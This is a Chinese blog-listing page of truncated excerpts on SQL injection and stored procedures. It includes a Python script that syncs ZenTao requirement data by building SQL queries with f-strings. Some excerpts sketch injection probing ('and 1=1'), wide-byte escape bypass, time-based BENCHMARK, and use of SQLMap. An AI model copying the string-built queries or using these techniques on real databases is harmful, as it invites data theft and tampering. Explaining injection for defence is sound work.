1. SQL 注入SQL 注入是非常常见的一种网络攻击方式,主要是通过参数来让 mysql 执行 sql 语句时进行预期之外的操作。即:因为传入的参数改变SQL的语义,变成了其他命令,从而操作了数据库。产生原因:SQL语句使用了动态拼接的方式。例如,下面这段代码通过获取用户信息来校验用户权限:import pymysqlsql = 'SELECT count(*) as count FROM us...
如此高效通用的分页存储过程是带有sql注入漏洞的zt
10-29
总之,虽然存储过程在一定程度上可以提供SQL注入的防护,但在通用分页存储过程等需要接收用户输入的场景中,必须特别小心设计和实现,以防止SQL注入漏洞的存在。一旦存储过程可以接受用户直接输入的数据,那么就需要...
清除SQL注入的存储过程
01-15
一个很方便的清除SQL注入的存储过程 只需要知道注入的代码就可以批量删除整个数据库中的注入代码 免去了一张表一张表去更改的麻烦
SQL高级注入使用储存过程
weixin_34357962的博客
08-29 245
===================================== =====SQL高级注入使用储存过程 ====== ===================================== 转载注来自:http://itpro.blog....
mysql 存储过程 注入_mysql PDO和存储过程动态SQL注入
weixin_29385641的博客
01-19 195
正如我在许多文章中看到的那样,存储过程中的动态SQL容易受到SQL注入的攻击.但是,如果我们将先前的PDO与准备好的语句一起使用,这仍然不安全吗?例:CREATE PROCEDURE my_sp(IN in_var VARCHAR(32))BEGINDECLARE query VARCHAR(255);SET @query = CONCAT("SELECT * FROM my_table WHE...
5-SQL注入问题及结局办法、视图、触发器、事务、存储过程(基本使用、三种开发模型、创建存储过程、如何使用存储过程)、mysql函数、流程控制、索引和联合索引
linjun的博客
07-14 211
5-SQL注入问题及结局办法、视图、触发器、事务、存储过程(基本使用、三种开发模型、创建存储过程、如何使用存储过程)、mysql函数、流程控制、索引和联合索引
-- coding: utf-8 -- “”" @file: async_zt_flow_hcproblem @author: maxiaolong01 @date: 2025/7/17 10:14 “”" import datetime import pprint from tortoise import run_async from app.models.product import RequirementPool from app.settings import TORTOISE_ORM from app.utils.db import MySqlClient estimated_finish_date = datetime.date(1971, 1, 1) async def get_zt_materiallib(sql: str = ‘select * from zt_materiallib’): result = {} async with MySqlClient(TORTOISE_ORM) as client: for item in await client.execute_query(sql): release_date = item.get( “releaseDate”, datetime.date( 1971, 1, 1)) result["release_date"] = str(release_date) result["software_project"] = item.get("name", "未关联") print("release_date:", release_date, datetime.date( 1971, 1, 1)) if release_date == datetime.date( 1971, 1, 1): result["requirement_status"] = "超期未关闭" if datetime.date.today( ) > estimated_finish_date else "按期未关闭" print("requirement_status:", datetime.date.today(), estimated_finish_date, result["requirement_status"]) else: result["requirement_status"] = "按期关闭" if release_date < estimated_finish_date else "超期关闭" print("requirement_status:", release_date, estimated_finish_date, result["requirement_status"]) return result async def get_zt_build(sql: str = ‘select * from zt_build’): result = {} async with MySqlClient(TORTOISE_ORM) as client: for item in await client.execute_query(sql): associated_version = item.get(name”, “未关联”) result[“associated_version”] = associated_version result[“associated_version_id”] = item.get(“id”, 0) sql = f""" SELECT m.releaseDate,p.name FROM zt_materiallib m LEFT JOIN zt_project p ON p.id = m.project WHERE m.topubbaseline = '{associated_version}' AND m.status = '1' LIMIT 1 """ d = await get_zt_materiallib(sql) if not d: d["release_date"] = str(datetime.date( 1971, 1, 1)) d["software_project"] = "未关联" d["requirement_status"] = "超期未关闭" if datetime.date.today( ) > estimated_finish_date else "按期未关闭" print("requirement_status:", datetime.date.today(), estimated_finish_date, d["requirement_status"]) result.update(d) return result async def get_zt_hctransform(sql: str = ‘select * from zt_hctransform where fromid = 1 and type = “hcrequirementtostory”’): result = [] async with MySqlClient(TORTOISE_ORM) as client: transformid = None for item in await client.execute_query(sql): transformid = item.get(“transformid”) sql = f"“” SELECT * FROM zt_build WHERE stories LIKE ‘%{transformid}%’ AND deleted = ‘0’ ORDER BY id DESC LIMIT 1 “”" build_data = await get_zt_build(sql) if not build_data: build_data.update({ “rd_req_id”: 0, “release_date”: str(datetime.date( 1971, 1, 1)), “software_project”: “未关联”, “requirement_status”:“超期未关闭” if datetime.date.today( ) > estimated_finish_date else “按期未关闭” }) else: build_data.update({“rd_req_id”: transformid}) result.append(build_data) return result async def get_zt_flow_hcrequirement_item(sqlfile: str = ‘./app/tasks/sql/zt_flow_hcrequirement.sql): result = [] global estimated_finish_date with open(sqlfile, ‘r’, encoding=‘utf-8’) as f: sql = f.read() async with MySqlClient(TORTOISE_ORM) as client: for item in await client.execute_query(sql): fromid = item.get(zt_id”) sql = f’select * from zt_hctransform where fromid = {fromid} and type = “hcrequirementtostory”’ print(sql) estimated_finish_date = datetime.date.fromisoformat(item.get( “estimated_finish_date”, “1971-01-01”)) rd_req_data_list = await get_zt_hctransform(sql) data = {"" "zt_id": item.get("zt_id"), "project_no": item.get("project_no"), "equip": item.get("equip"), "req_name": item.get("req_name"), "req_sub_date": datetime.datetime.strptime(item.get("req_sub_date", "1971-01-01"), '%Y-%m-%d').strftime('%Y-%m-%d %H:%M:%S'), "estimated_finish_date": datetime.datetime.strptime(item.get("estimated_finish_date", "1971-01-01"), '%Y-%m-%d').strftime('%Y-%m-%d %H:%M:%S'), "req_dev_leader": item.get("req_dev_leader") } # pprint.pprint(item) # pool, _ = await RequirementPool.update_or_create(**data) rd_red_data = [] for i in rd_req_data_list: d = { "associated_version": i.get("associated_version", "未关联"), "associated_version_id": i.get("associated_version_id", 0), "rd_req_id": i.get("rd_req_id", None), "release_date": i.get("release_date", datetime.datetime.strptime("1971-01-01", '%Y-%m-%d').strftime('%Y-%m-%d %H:%M:%S')), "requirement_status": i.get("requirement_status", "未关闭"), "software_project": i.get("software_project", "未关联"), } data.update(d) print(data) rd_red_data.append(RequirementPool(**data)) if rd_red_data: print(rd_red_data) await RequirementPool.bulk_create(rd_red_data) # await RDReqData.bulk_create(rd_red_data) async def insert_product_requirement_pool(): await get_zt_flow_hcrequirement_item() if name == ‘main’: run_async(get_zt_flow_hcrequirement_item()) 再造成分批并发同步 展示优化后的全部代码
09-05
在`get_zt_flow_hcrequirement_item`函数中,我们循环执行`client.execute_query(sql)`得到的每一项,然后对每一项又调用`get_zt_hctransform`,而`get_zt_hctransform`又调用了`get_zt_build`,`get_zt_build`又...
# -*- coding: utf-8 -*- """ @file: async_zt_flow_hcproblem @author: maxiaolong01 @date: 2025/7/17 10:14 """ import datetime import asyncio import time from tortoise import run_async from tortoise.transactions import in_transaction from app.models.product import RequirementPool from app.settings import TORTOISE_ORM from app.utils.db import MySqlClient BATCH_SIZE = 50 # 每批处理的项目数量 CONCURRENCY_LIMIT = 10 # 最大并发任务数 TIMING_DATA = {} # 存储各阶段耗时统计 class OptimizedMySqlClient: """增强版MySQL客户端(连接池管理)""" def __init__(self): self.pool = None async def initialize_pool(self): """初始化连接池""" if not self.pool: self.pool = await MySqlClient.create_pool(TORTOISE_ORM) print(f"连接池初始化完成: 最大连接数={self.pool.maxsize}") return self.pool async def execute_query(self, sql: str): """使用连接池执行查询""" async with self.pool.acquire() as conn: async with conn.cursor() as cursor: await cursor.execute(sql) return await cursor.fetchall() async def close_pool(self): """关闭连接池""" if self.pool: await self.pool.close() self.pool = None print("数据库连接池已关闭") # 全局单例客户端 mysql_client = OptimizedMySqlClient() async def get_zt_materiallib(sql: str, estimated_date: datetime.date) -> dict: """获取物料库信息(使用共享连接池)""" start_time = time.perf_counter() results = {} for item in await mysql_client.execute_query(sql): release_date = item.get("releaseDate", datetime.date(1971, 1, 1)) status = "按期关闭" if release_date <= estimated_date else "超期关闭" results[item["id"]] = { "release_date": str(release_date), "software_project": item.get("name", "未关联"), "requirement_status": status } TIMING_DATA.setdefault('materiallib', []).append( time.perf_counter() - start_time) return results async def get_zt_build(build_id: int, estimated_date: datetime.date) -> dict: """获取构建信息(使用共享连接池)""" start_time = time.perf_counter() sql = f""" SELECT b.id, b.name, m.releaseDate, p.name AS project_name FROM zt_build b LEFT JOIN zt_materiallib m ON m.topubbaseline = b.name AND m.status = '1' LEFT JOIN zt_project p ON p.id = m.project WHERE b.id = {build_id} """ items = await mysql_client.execute_query(sql) if not items: status = "超期未关闭" if datetime.date.today() > estimated_date else "按期未关闭" result = { "associated_version": "未关联", "associated_version_id": build_id, "release_date": str(datetime.date(1971, 1, 1)), "software_project": "未关联", "requirement_status": status } else: item = items[0] release_date = item.get("releaseDate", datetime.date(1971, 1, 1)) status = "按期关闭" if release_date <= estimated_date else "超期关闭" result = { "associated_version": item.get("name", "未关联"), "associated_version_id": build_id, "release_date": str(release_date), "software_project": item.get("project_name", "未关联"), "requirement_status": status } TIMING_DATA.setdefault('build', []).append( time.perf_counter() - start_time) return result async def process_transformation(transform_id: int, estimated_date: datetime.date) -> dict: """处理需求转换(使用共享连接池)""" start_time = time.perf_counter() sql = f""" SELECT id, stories FROM zt_build WHERE stories LIKE '%{transform_id}%' AND deleted = '0' ORDER BY id DESC LIMIT 1 """ builds = await mysql_client.execute_query(sql) if not builds: status = "超期未关闭" if datetime.date.today() > estimated_date else "按期未关闭" result = { "rd_req_id": transform_id, "release_date": str(datetime.date(1971, 1, 1)), "software_project": "未关联", "requirement_status": status } else: build_id = builds[0].get("id") build_data = await get_zt_build(build_id, estimated_date) build_data["rd_req_id"] = transform_id result = build_data TIMING_DATA.setdefault('transformation', []).append( time.perf_counter() - start_time) return result async def process_requirement_item(item): """处理单个需求项(使用事务批量提交)""" start_time = time.perf_counter() estimated_date = datetime.date.fromisoformat( item.get("estimated_finish_date", "1971-01-01")) transform_sql = f'SELECT * FROM zt_hctransform WHERE fromid = {item["zt_id"]} AND type = "hcrequirementtostory"' transforms = await mysql_client.execute_query(transform_sql) transform_tasks = [process_transformation( t["transformid"], estimated_date) for t in transforms] transform_results = await asyncio.gather(*transform_tasks) base_data = { "zt_id": item["zt_id"], "project_no": item["project_no"], "equip": item["equip"], "req_name": item["req_name"], "req_sub_date": datetime.datetime.strptime( item.get("req_sub_date", "1971-01-01"), '%Y-%m-%d').strftime('%Y-%m-%d %H:%M:%S'), "estimated_finish_date": datetime.datetime.strptime( item.get("estimated_finish_date", "1971-01-01"), '%Y-%m-%d').strftime('%Y-%m-%d %H:%M:%S'), "req_dev_leader": item["req_dev_leader"] } requirement_data = [] for transform in transform_results: req_data = { **base_data, "associated_version": transform.get("associated_version", "未关联"), "associated_version_id": transform.get("associated_version_id", 0), "rd_req_id": transform.get("rd_req_id"), "release_date": transform.get("release_date"), "requirement_status": transform.get("requirement_status", "未关闭"), "software_project": transform.get("software_project", "未关联") } requirement_data.append(RequirementPool(**req_data)) # 使用事务批量创建 if requirement_data: async with in_transaction() as connection: await RequirementPool.bulk_create(requirement_data, using_db=connection) TIMING_DATA.setdefault('item', []).append(time.perf_counter() - start_time) return len(requirement_data) async def process_requirement_batch(item_batch: list): """批量处理需求项(带连接池的健康检查)""" batch_start = time.perf_counter() semaphore = asyncio.Semaphore(CONCURRENCY_LIMIT) async def process_with_semaphore(item): async with semaphore: return await process_requirement_item(item) results = await asyncio.gather(*[process_with_semaphore(item) for item in item_batch]) batch_time = time.perf_counter() - batch_start TIMING_DATA.setdefault('batch', []).append({ 'batch_size': len(item_batch), 'processing_time': batch_time, 'items_processed': sum(results) }) async def get_zt_flow_hcrequirement_item(sqlfile: str = './app/tasks/sql/zt_flow_hcrequirement.sql'): """主处理函数(含连接池生命周期管理)""" global TIMING_DATA TIMING_DATA = {'total_start': time.perf_counter()} # 初始化连接池 await mysql_client.initialize_pool() with open(sqlfile, 'r', encoding='utf-8') as f: sql = f.read() all_items = await mysql_client.execute_query(sql) TIMING_DATA['total_items'] = len(all_items) # 分批处理并计时 for i in range(0, len(all_items), BATCH_SIZE): batch = all_items[i:i + BATCH_SIZE] await process_requirement_batch(batch) TIMING_DATA['total_end'] = time.perf_counter() TIMING_DATA['total_duration'] = TIMING_DATA['total_end'] - \ TIMING_DATA['total_start'] # 打印详细耗时报告 print("\n===== 并发执行耗时报告 =====") print(f"总处理项: {TIMING_DATA['total_items']}") print(f"总耗时: {TIMING_DATA['total_duration']:.4f}秒") # 连接池使用统计 if mysql_client.pool: pool_stats = { 'size': mysql_client.pool.size, 'free': mysql_client.pool.freesize, 'used': mysql_client.pool.size - mysql_client.pool.freesize } print( f"连接池状态: 总数={pool_stats['size']} 使用中={pool_stats['used']} 空闲={pool_stats['free']}") # 关闭连接池 await mysql_client.close_pool() async def insert_product_requirement_pool(): """入口函数(含连接池管理)""" await get_zt_flow_hcrequirement_item() if __name__ == '__main__': # 完整执行流程 start_time = time.time() print("任务开始执行...") run_async(insert_product_requirement_pool()) print(f"任务总执行时间: {time.time() - start_time:.2f}秒") 优化这个脚本 MySqlClient 不用
最新发布
09-05
# 使用参数化查询避免SQL注入 sql = """ SELECT id, stories FROM zt_build WHERE stories LIKE '%' || $1 || '%' AND deleted = '0' ORDER BY id DESC LIMIT 1 """ conn = connections.get("default") ...
sql语句这个写法对吗?SELECT b.*, COALESCE(p_product.name, b.product) AS c_product, COALESCE(l_pri.value, b.pri) AS c_pri, COALESCE(l_severity.value, b.severity) AS c_severity, COALESCE(p_project.name, b.project) AS c_project FROM zt_bug b LEFT JOIN zt_product p_product ON b.product = p_product.id LEFT JOIN zt_lang l_pri ON b.pri = l_pri.key AND l_pri.section = 'priList' AND l_pri.module = 'bug' LEFT JOIN zt_lang l_severity ON b.severity = l_severity.key AND l_severity.section = 'severityList' LEFT JOIN zt_project p_project ON b.project = p_project.id AND p_project.type = 'project';
05-08
同时,提醒他们在使用外部变量或动态SQL时,预防NULL注入的方法,比如使用COALESCE或IFNULL函数来设置默认值。 最后,生成相关问题时,要围绕SQL中NULL的常见错误、比较运算符的选择、性能影响等展开,帮助用户...
sql 存储过程注入_一次非常规 SQL 注入(informixsql)的利用过程
weixin_39969257的博客
12-09 326
介绍一个客户正在寻找升级他们的思科 UCM 软件,并希望保证他们的实现是安全配置的。在评估期间,我们在 Cisco UCM 管理员门户中发现了一个经过身份验证的 SQL 注入问题。在大多数情况下,可以使用 SQLMap 或其他工具来自动发现问题。由于我们是在客户端的开发环境中进行测试的,所以我们被允许对 Cisco UCM 执行更积极的攻击。我最初使用SQLMap 命令如下:root...
mysql 存储过程 注入_MySQL数据库(六) —— SQL注入攻击、视图、事物、存储过程、流程控制...
weixin_35598104的博客
01-19 365
SQL注入攻击、视图、事物、存储过程、流程控制一、SQL注入攻击1、什么是SQL注入攻击importpymysqlconn=pymysql.Connect(user="root",password="admin",host="localhost",database="day43",charset="utf8")cursor=conn.cursor(pymysql.cursors.DictCurso...
SQL注射检测之突破存储过程进行sql注入
老猫
12-23 1154
本博客已经转移到http://www.kexiangsoft.com(科翔工作室)
SQL注入问题 修改表SQL语句 视图 触发器 事物 存储过程 函数 流程控制 索引
Lamb的博客
05-09 311
【代码】SQL注入问题 修改表SQL语句 视图 触发器 事物 存储过程 函数 流程控制 索引。
mysql 存储过程 注入_mysql 视图 事务 存储过程 SQL注入
weixin_39967812的博客
01-19 233
视图视图的本质就是一张虚拟的表虚拟表:在硬盘中没有的,通过查询在内存中拼接的表视图:通过查询得到一张虚拟表,保存下来,下次可以直接使用为什么要用视图如果要频繁使用一张虚拟表,可以不用重复查询如何用视图create view teacher_course as select * from teacher inner join course on teacher.id=course.id;creat...
通俗理解存储过程注入
weixin_43172311的博客
06-14 1279
当攻击者往存储过程的输入参数里塞入恶意代码,导致数据库执行非预期的操作时,就发生了**存储过程注入(Stored Procedure Injection)**。
mysql 存储过程 注入,是否可以使用存储过程进行sql注入
weixin_33685869的博客
01-19 109
I saw some similar question, none about mysql...Is there any way to do a sql injection into a SP?How do I protect from this on the SP level?In other words, can the Query strucutre, inside a SP can be ...
mysql 存储过程 sql注入_存储过程是否可以防止SQL注入
weixin_34198817的博客
02-27 3008
存储过程并不能神奇地阻止SQL注入,但是它们确实使防止注入变得容易得多。您所要做的只是类似以下内容(Postgres示例):CREATEORREPLACEFUNCTIONmy_func(INin_user_id INT)[snip]SELECTuser_id,name,addressFROMmy_tableWHEREuser_id=in_user_id;--BAM! SQL INJECTION I...
简单易懂SQL注入讲解
weixin_56606020的博客
03-14 851
SQL注入 注入原理:通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 数值型注入: 当输入参数为数字时候可能为数值型,列如:https://123abc.com/tes.php?id=1我们可以在参数后面加 ’ 判断是否存在注入点,如果加 ‘ 后页面报错则有可能存在注入点 也可以用 and 1=1 页面正常 and 1=2 页面出错来判断是否存在.
注入以及防护sql注入
weixin_68408599的博客
04-26 863
但是我们输入x后由于x被截断,x也就不会显示在数据库里(我曾经想过如果不截断会不会造成缓冲区溢出的原理,但是想想数据库严格限制了输入的内容,栈溢出也就不存在,应该是这样的吧)。BENCHMARK(1,ENCODE('1','2')),这个语句是将BENCHMARK(1,ENCODE('1','2'))执行一次,可能一瞬间就完成了,姑且算它0.000001秒就完成了吧,但是大家有没有想过,如果我将这个函数。因此综上所述,当我们遇到反斜杠转义时,就可以在前面输入bf,就可以使其混乱,从而绕过它的转义字符。
SQL高级注入技术详解
"这是一份关于MS SQL Server高级注入技术的笔记,涵盖了利用系统对象、存储过程以及危险的XP扩展存储过程进行SQL注入攻击的方法。笔记中提到了多个系统表,如sysobjects、sysindexes、syscolumns等,用于获取数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值